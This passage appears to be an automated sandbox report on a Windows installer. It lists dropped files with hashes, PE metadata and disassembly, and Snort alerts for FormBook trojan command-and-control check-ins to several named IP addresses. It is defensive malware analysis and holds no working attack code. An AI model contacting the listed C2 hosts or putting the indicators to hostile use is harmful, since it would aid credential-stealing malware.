                                                                                    SHA-512:87335A43B9CA13E1300C7C23E702E87C669E2BCF4F6065F0C684FC53165E9C1F091CC4D79A3ECA3910F0518D3B647120AC0BE1A68EAADE2E75EAA64ADFC92C5A
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: comprobante de transferencia.exe, Detection: malicious, Browse
                                                                                    • Filename: cuenta para pago1.exe, Detection: malicious, Browse
                                                                                    • Filename: venerationens.exe, Detection: malicious, Browse
                                                                                    • Filename: venerationens.exe, Detection: malicious, Browse
                                                                                    • Filename: Interviewed.exe, Detection: malicious, Browse
                                                                                    • Filename: Interviewed.exe, Detection: malicious, Browse
                                                                                    • Filename: Arborean.exe, Detection: malicious, Browse
                                                                                    • Filename: Medarbejderstabens189.exe, Detection: malicious, Browse
                                                                                    • Filename: Afslrings.exe, Detection: malicious, Browse
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L...zc.W...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Skematisering\Fjeldklftens38.bio

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Grundforbedre39.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):200432
                                                                                    Entropy (8bit):3.234993383739913
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:MbK3xS/itsupP4zlLPatE1650lNzpANsqud:x2K16zJa2Qwd
                                                                                    MD5:910B94BB45EC253A90F4CA8FA56BC584
                                                                                    SHA1:ED29E140FE94207B697953B8D1466F7C02F4E60E
                                                                                    SHA-256:BE72DFD9F250BBD69DCFD4508D08A327CBB9B3FBB11964FD5F66BEE35A9FD5C9
                                                                                    SHA-512:93C902D3EC6959BBFA801D13A787A157A998B3615E69EFA205D0952FA6A9935AB699E62316A20F5DB0682DA340FAC8B8454272DDFE9C82D7C16CF57FBB6EE1A0
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:j....................W.................w......Y............'.......e.......h.E.R.........................................w.O..............B.......e.............!...M..r..................i....o.......D.........".....$.....k....)........................V..................o..n.....w...............j.nO..........B..........a......K.......=....a............hA......0......w...........X......x.........$..u..G..........t.....X........|.....H.............................................x.....4...K....7...............j................!...3......F......l......T............U.......v.............~..ay..............G.T...v.q.Tl.'..T...cZ.........1.........,.......H...........P.............n.5...................y...V..[.................~..c..............O.v...V............a.......z=.....r.................{.....P.............+..........$............./.....#................/.....@.....5Q..2...../................H.......3............u|.........$.........................w.i......................c.......

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Skematisering\Jannicks.Lev

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Grundforbedre39.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):236303
                                                                                    Entropy (8bit):7.7883491378816885
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:ber1IK40yyVlVHGsp69EHf7tm+X3A8n0LC:KaMVlwsi4Yk0O
                                                                                    MD5:4386E4D05A2CE413246DF9930185A660
                                                                                    SHA1:C1D82A8FF3E009BDF3821CCA19C5EEFB104C3BBA
                                                                                    SHA-256:0F908E84C753998701648FBB8C3165E8B121C9153033570D481A314786A34D0B
                                                                                    SHA-512:B27739B5006E0265306100B50CCF665048D4A44F32DF249A3A0DD1EDD236062ED198F27F79EF1760FC639F3873F4D303A2461AD33F951E13FA806C64D020C663
                                                                                    Malicious:false
                                                                                    Preview:.K......................................................................4.............................j....5..B.................................................f...f.g....QD..F.............................................................................f..........2[..f...............................................B.v......l".C..............................................................................................................f.q..G.B.e!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!...f......g...9.....................................................................................................F].......`........................................................................................................e...".................................................................................................f.......f....Y.]Daccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc....#......}..U................................

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Skematisering\Yppigere.Kon

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Grundforbedre39.exe
                                                                                    File Type:GTA audio index data (SDT)
                                                                                    Category:dropped
                                                                                    Size (bytes):53468
                                                                                    Entropy (8bit):4.565460115431186
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:Io23DAPp+XOzBVhf52yaEpeFab4rGVnhKmwxgQH26a3SszPAENOhO4VUxu:IoaDADThHxpeoEqzC9s7QhO4J
                                                                                    MD5:E3BE96075AE2412EA89A85B681A0EE0A
                                                                                    SHA1:ACA8F411FB66B98F3886C76586BBFAC984AB2712
                                                                                    SHA-256:6D4AA4D0AF94B1C59A822E4CE044434E24B79874F5D915DAED68EF3A0D815A26
                                                                                    SHA-512:4BAFF06C296306802FDCC58853AAAED1427285F0D30361DF785FD9AB115DD049E9424CCC1D2B7A1FC96480543E2737AEA5346E378732081921F6E7FED3B165CF
                                                                                    Malicious:false
                                                                                    Preview:....c....;..>..............................a.gg.MM.]]]]]........................D.:..|||....!!!....&..===.....:....F......\..........%%%....E........DD.1.............m..SSS.z........................./.......j..........4......D.ZZZ....WW.......5..>....2....b.VV.....tt.....LLL.............11111........................]..}}.........P................uu.qq..]]]]]...#.......%....j........CC.'.DD..........................T.555555....Y..................=...f.RR.....!......y.'..........e..>>......,.yyyyyy....\\\\\............. ......CC...............A..//...}}..........DDDD..6...i....ggg................w.....]...............%..d....^^..................}........%%%%...!!!........#............................22.Y.............44444..\.....?......X.i.,.........E.}}.......v....NN..=........4.!...H..........Y..........................00...K....___..................GGGG...q......y...(......OOOO...........kk..\\\..."""...........hhhhh...@...###.YY...OOO..fff....0000.w.^.dd........__.}}..............

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Subfastigiate\Felaheen\Tilbragte\sydhavn\kannevasen.txt

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Grundforbedre39.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):453
                                                                                    Entropy (8bit):4.317248216463251
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:pUVo0WmtKoENHeo6fAy/22Xe7V9Ec/BZMIjbAl4WOE:KjKb9Vyul59JXehn
                                                                                    MD5:9F716DE9908957BD324DCC4ADA5A33F7
                                                                                    SHA1:5AA93CFD2DF40B9ED1F46A728EEE203258DC05DD
                                                                                    SHA-256:CDBC11AE1032690D95484A15A78C94AECFEE10103E26372894547D7B25C01A94
                                                                                    SHA-512:0C47E325FD292F1E782B69F985A92336D1F0DF39E8C0902389F81BB6E7CE212968EF6EA9ABCBE2C8B9869021A9095B868E93AF51EBF8085596FCC5B05E35F237
                                                                                    Malicious:false
                                                                                    Preview:reaudition bancal scalelike boligaktivister uninstructedness..tankers befragternes unfoggy snowmaker ectrodactylia leachier..gopherman ultrarapidt ichthyosis repine leniencies mistreading..supergravitated indlemning rhinoceroses hjaelpelaerere dizzies spndkraft kopskifte reenlargement backtack tylosoid..brevpakkernes foderautomaten supersarcasm lystrede whiteheart teratogenous.fetology uneddied archprimate pilotprojekters slovakish pseudoassertive..

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Vandforsyningers\Fandens\Gaudiest.pre

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Grundforbedre39.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):274661
                                                                                    Entropy (8bit):3.2513826448357057
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:VLYngh97JDNV3fLhV/OKJCY2kKIwk7Xf7NTVaYYvPclKkL:5Y6Dnj7JCkK/ovBT89cII
                                                                                    MD5:9CB88B1AE7827818B29E20B15C82A937
                                                                                    SHA1:A60DFA07CBF65C96A3C7019D99452F138A12746E
                                                                                    SHA-256:445AA65354C5F1118FE748FE21ACFA11A69400398DD1CEAE2362242B187CF754
                                                                                    SHA-512:2D0B4879369B2ADF0136AA2CDB1299614311A16D76F2A4FB90521E5D2EA17153874DA1F40C25A0CEBEDBE18DD31C2102AA0B6FAF295F1838FB3798CACA3EF1BE
                                                                                    Malicious:false
                                                                                    Preview:_..................................................J...T......4..N.......1................D...?...a.....j..................2................0.\.J...M...y....Ib..E...he...F..!...............$.M...........D.t...N....m...................j.......................g.z.....}.q.....,.........:....5................J.....]......=..............S......'.....M.:.........P....s...V..w...............|.......5.....D..............=."......8...l..............7..................'....j.....c..................."Z..E.f.......a.....S....|......w=...'t.[vP".........J...Y.........../.......K..........IlB......5........(...........E.b.....@.....................B...................qI.... ......}..>......k.;.Q........U..@e..............J,..qB...`h............:.......x.......3........................L..........2.B...............................P.....z...............=...e....&.....Z..............%.....~h......................................*........l.....G.................]...............H............Y........

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Vandforsyningers\Fandens\Undervisningsform.bek

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Grundforbedre39.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):272352
                                                                                    Entropy (8bit):3.2380792387673005
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:9wrIYjPjPwOv1ccOX2vCXCdj4w8JJ3WkPd+Eix/j8lQ1KpB:9lYjTwOdccNCup8JJLP8EiF8lB
                                                                                    MD5:93A04CCDF51474B877C9414AE5AD2760
                                                                                    SHA1:1321C10A4CC69A33235C87ABF2779A57619533BB
                                                                                    SHA-256:D9DCAF7157CB66EFE264672D39EA0D004DD2CECDAC777BDB857509AEDDF040FF
                                                                                    SHA-512:675C752DEDAD08A6BBBB976A3E26F03D54B1AF4DDA84999B7749D8DB67BA01E1488CC92AFB5C769A5B4BE3DD67B6AC0038D9062CD8DDEB025E9493241038DB2D
                                                                                    Malicious:false
                                                                                    Preview:..........................................................................&....\..................+.\.......8.@.......+...?d.."...B.............................;....................:..6.....f......h...................n...L.....................m..........$...................4...........Yf.......................+.......P......'..u...........4.......S....K*......!.........1h.....'........................F........AJQ.........P.......k.........8.......Z...B......Z#c........h.....................U.......a....j.......e..!~..C....n!..8.......B........................-...f......y.q.....,....Y........i.........1..~.....c................cQ..............g.z..........................................X........}..........................V.........8...............p....Q..f. .............................^.....).............................o..........^............?......8........................4......................X...........................7S.....O..................p......>......................

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Vandforsyningers\Fandens\floddeltaets.mar

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Grundforbedre39.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):207086
                                                                                    Entropy (8bit):3.2412864519720883
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:/xOtUWnnPV6AtPH2oDGzK6jQoplsYXzYl:/xvE6Afw5jQoplLYl
                                                                                    MD5:1171715CBB2206BFF607138FEF73877F
                                                                                    SHA1:D7059E4A741A345239A17FE037C8605D4219E28C
                                                                                    SHA-256:27A8BF54AD65E1DC2C3C88BE4A56792C4960365F12BFF185676D0D4966AE3B31
                                                                                    SHA-512:69449053EAD94E7B0894729E3608F767D8E53775300F876EEC04712C653580EFCEE192BB64EE4A5D10A3B4648351DD0DCB4661F8EB62199BC92B661967ABDB4E
                                                                                    Malicious:false
                                                                                    Preview:...F...$>..........$.K...\.........................'M.......G.......h...4....4..............85......o.}..........e....................<.............H..........l.....DY...c...........N...6...]...n..............................2..q..I....W....................8........-.......2...K..............J..%<.....O..]...m.......H.......z..........................9s........!......s..8.................u..............y.gS................v...`...........a........Q...... .....................j............G...........~.................... ................b.........q...v............p..............S..........{.............c.......#!..........;...................=6.R...1.....6.....t.9...........9....4................9..p.....Y...0..........|...........U..........,......W...~.......d.&.......k{.B.......r......3...w.:..[.^$_...........s.........)....,l..P..........9......{........b......................y...u..C............/..............d..:..............................6.>.#.......>.I2.y.............

                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Vandforsyningers\Fandens\gagers.rec

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\Grundforbedre39.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):183776
                                                                                    Entropy (8bit):3.2465393215116713
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:0Y0pp0QgB1Uepc+D+FJOHDz9WWhEGwk/oZP:0Y0piQgB1Uepc+6Q5h7T/+
                                                                                    MD5:B013C10185F365E645B1A8A4090DE5AF
                                                                                    SHA1:20F0178AD225AEC8785EA741E82729E6D816CEF0
                                                                                    SHA-256:0A403F11C29743BFFF4A5CBB13DA533121BC9CEC2F2BD38473F3939895422E4C
                                                                                    SHA-512:B33FDB0357DA26C5E4A6BB45B50FDEAFE102E428F56D90A5EAC57829F5F57F8323C689A2BE928A468DB46948012078D10B605AE03F246EAA72827B1351807412
                                                                                    Malicious:false
                                                                                    Preview:...Y..[..-.........<..\.....IB......................}-.....................?.....a.......}..........,..........1...>..........9||...........&.....!.....T.................h....;....G............./N................G....................!..E...........:...0............=.......................,........l...'..............e...........Z..I..H...M..>...p..........j....S.].....................r..........v..........................l.......ad......q!.....b.4...(...............3............h..................^...........^...................b........................~.......^n.........e...................&.....................................H......6.................j....S..e........g..........H........5...........)...............,....8_..................7................Z.........o.n.......W....4...t.....|..........2.....o...............................y..%..n........hh....0....X...{...W..$...9..l..........*.............Ji..........I.........|...........F.....|......G.4....M.0Y.8...............

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                    Entropy (8bit):7.985402539382548
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:Grundforbedre39.exe
                                                                                    File size:786'800 bytes
                                                                                    MD5:0190a49f09dc90c7dc61959581be1e9f
                                                                                    SHA1:af5d8cfa73b77d96d3a489f5961cdab87c8339be
                                                                                    SHA256:cfa3c71c41d7a69fdfa223a92ec677067613c69b2b2627d760cda587725bfbf0
                                                                                    SHA512:a97c554093fbd30b39b921ce0c6ccf49b3f3bc3a2337a1d869788aa240b73e60e3f3a3d3a0d8f2441804ab58a1857618366fc02eea55650312f1f1de791a729c
                                                                                    SSDEEP:12288:LqLg193/433+TE58vkyFfgN5B8B/5FsfecVB0kh3ObwMB8aqEEbViGCyQRy1/6dy:Qg193w5uRa5BO5Fo9BbBoZyQqNbbfN/
                                                                                    TLSH:36F4232096826061F0E1D4B11FF7F753D93599E8C222EA1E1B711A79398DB02CB3637B
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..OP..*_...P...s...P...V...P..Rich.P..........PE..L....c.W.................`...*......j2.......p....@

                                                                                    File Icon

                                                                                    Icon Hash:3d2e0f95332b3399

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x40326a
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:true
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x57956391 [Mon Jul 25 00:55:45 2016 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:e2a592076b17ef8bfb48b7e03965a3fc

                                                                                    Authenticode Signature

                                                                                    Signature Valid:false
                                                                                    Signature Issuer:E=Facecloth218@Sagnomspunden79.Mel, O=Sciot, OU="Fundamentals Nonegotistic ", CN=Sciot, L=Philadelphia, S=Pennsylvania, C=US
                                                                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                    Error Number:-2146762487
                                                                                    Not Before, Not After
                                                                                    • 01/02/2024 01:07:33 31/01/2027 01:07:33
                                                                                    Subject Chain
                                                                                    • E=Facecloth218@Sagnomspunden79.Mel, O=Sciot, OU="Fundamentals Nonegotistic ", CN=Sciot, L=Philadelphia, S=Pennsylvania, C=US
                                                                                    Version:3
                                                                                    Thumbprint MD5:4893862384F04EBBAFDF562C827FD57D
                                                                                    Thumbprint SHA-1:20F3D03391507DDE89BEAB3C4CCCA40C9CECA43A
                                                                                    Thumbprint SHA-256:C354AA4AA0FC1F12A4BD219883E2C567C667EAA5CCA9F01389EF15AA52CFC295
                                                                                    Serial:58A8A66EDD4DDF633B143EC9BD20D65AE54B43F6

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    sub esp, 000002D4h
                                                                                    push ebx
                                                                                    push esi
                                                                                    push edi
                                                                                    push 00000020h
                                                                                    pop edi
                                                                                    xor ebx, ebx
                                                                                    push 00008001h
                                                                                    mov dword ptr [esp+14h], ebx
                                                                                    mov dword ptr [esp+10h], 004092E0h
                                                                                    mov dword ptr [esp+1Ch], ebx
                                                                                    call dword ptr [004070B0h]
                                                                                    call dword ptr [004070ACh]
                                                                                    cmp ax, 00000006h
                                                                                    je 00007F0344589A03h
                                                                                    push ebx
                                                                                    call 00007F034458CB44h
                                                                                    cmp eax, ebx
                                                                                    je 00007F03445899F9h
                                                                                    push 00000C00h
                                                                                    call eax
                                                                                    mov esi, 004072B8h
                                                                                    push esi
                                                                                    call 00007F034458CABEh
                                                                                    push esi
                                                                                    call dword ptr [0040715Ch]
                                                                                    lea esi, dword ptr [esi+eax+01h]
                                                                                    cmp byte ptr [esi], 00000000h
                                                                                    jne 00007F03445899DCh
                                                                                    push ebp
                                                                                    push 00000009h
                                                                                    call 00007F034458CB16h
                                                                                    push 00000007h
                                                                                    call 00007F034458CB0Fh
                                                                                    mov dword ptr [00429204h], eax
                                                                                    call dword ptr [0040703Ch]
                                                                                    push ebx
                                                                                    call dword ptr [004072A4h]
                                                                                    mov dword ptr [004292B8h], eax
                                                                                    push ebx
                                                                                    lea eax, dword ptr [esp+34h]
                                                                                    push 000002B4h
                                                                                    push eax
                                                                                    push ebx
                                                                                    push 004206A8h
                                                                                    call dword ptr [00407188h]
                                                                                    push 004092C8h
                                                                                    push 00428200h
                                                                                    call 00007F034458C6F8h
                                                                                    call dword ptr [004070A8h]
                                                                                    mov ebp, 00434000h
                                                                                    push eax
                                                                                    push ebp
                                                                                    call 00007F034458C6E6h
                                                                                    push ebx
                                                                                    call dword ptr [00407174h]
                                                                                    add word ptr [eax], 0000h

                                                                                    Rich Headers

                                                                                    Programming Language:
                                                                                    • [EXP] VC++ 6.0 SP5 build 8804

                                                                                    Data Directories

                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x75040xa0.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x670000xb48.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0xbe6700x1b00
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x70000x2b4.rdata
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                    Sections

                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x10000x5ff90x600034f0469eb860d5ecf0e52ef9d3820a60False0.6667073567708334data6.4734859396670705IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .rdata0x70000x13a40x1400848ecd58951d0a4cfe8ec8cfce6b20d1False0.452734375data5.125569346027248IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .data0x90000x202f80x6003953dbb7217e7539ee75e90871f7aef9False0.4947916666666667data3.9050018847265378IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .ndata0x2a0000x3d0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                    .rsrc0x670000xb480xc00737bf22e330f1bb677a1a75bfb3076c2False0.4215494791666667data4.359435247089545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                    Resources

                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                    RT_ICON0x671c00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.42473118279569894
                                                                                    RT_DIALOG0x674a80x100dataEnglishUnited States0.5234375
                                                                                    RT_DIALOG0x675a80x11cdataEnglishUnited States0.6056338028169014
                                                                                    RT_DIALOG0x676c80xc4dataEnglishUnited States0.5918367346938775
                                                                                    RT_DIALOG0x677900x60dataEnglishUnited States0.7291666666666666
                                                                                    RT_GROUP_ICON0x677f00x14dataEnglishUnited States1.2
                                                                                    RT_MANIFEST0x678080x33dXML 1.0 document, ASCII text, with very long lines (829), with no line terminatorsEnglishUnited States0.5536791314837153

                                                                                    Imports

                                                                                    DLLImport
                                                                                    KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, WaitForSingleObject, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GlobalUnlock, lstrcpynW, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                    USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
                                                                                    GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                    SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                                    ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                    COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                    ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                                    Possible Origin

                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                    EnglishUnited States

                                                                                    Network Behavior

                                                                                    Snort IDS Alerts

                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                    03/18/24-14:47:52.396598TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24977880192.168.11.20172.67.158.92
                                                                                    03/18/24-14:49:19.191753TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34979280192.168.11.2091.195.240.19
                                                                                    03/18/24-14:51:38.822796TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34980580192.168.11.20172.67.130.3
                                                                                    03/18/24-14:49:01.784764TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34978780192.168.11.2046.30.215.63
                                                                                    03/18/24-14:54:23.875361TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24983280192.168.11.20195.110.124.133
                                                                                    03/18/24-14:48:47.962356TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34978280192.168.11.20198.177.123.106
                                                                                    03/18/24-14:49:54.719267TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24979980192.168.11.2084.32.84.32
                                                                                    03/18/24-14:54:15.768570TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34982980192.168.11.20195.110.124.133
                                                                                    03/18/24-14:49:24.598414TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24979580192.168.11.2091.195.240.19
                                                                                    03/18/24-14:55:12.378053TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34983680192.168.11.20198.177.123.106
                                                                                    03/18/24-14:48:50.665934TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34978380192.168.11.20198.177.123.106
                                                                                    03/18/24-14:49:07.208566TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34978980192.168.11.2046.30.215.63
                                                                                    03/18/24-14:48:56.063124TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24978680192.168.11.20198.177.123.106
                                                                                    03/18/24-14:49:46.684407TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34979680192.168.11.2084.32.84.32
                                                                                    03/18/24-14:49:09.906007TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24979080192.168.11.2046.30.215.63
                                                                                    03/18/24-14:55:17.783109TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24983880192.168.11.20198.177.123.106
                                                                                    03/18/24-14:54:04.569559TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34982680192.168.11.2084.32.84.32
                                                                                    03/18/24-14:51:57.738933TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24981180192.168.11.2084.32.84.32
                                                                                    03/18/24-14:55:09.672400TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34983580192.168.11.20198.177.123.106
                                                                                    03/18/24-14:51:52.365896TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34980980192.168.11.2084.32.84.32
                                                                                    03/18/24-14:52:14.229849TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34981380192.168.11.20217.70.184.50
                                                                                    03/18/24-14:55:27.140061TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34984080192.168.11.2046.30.215.63
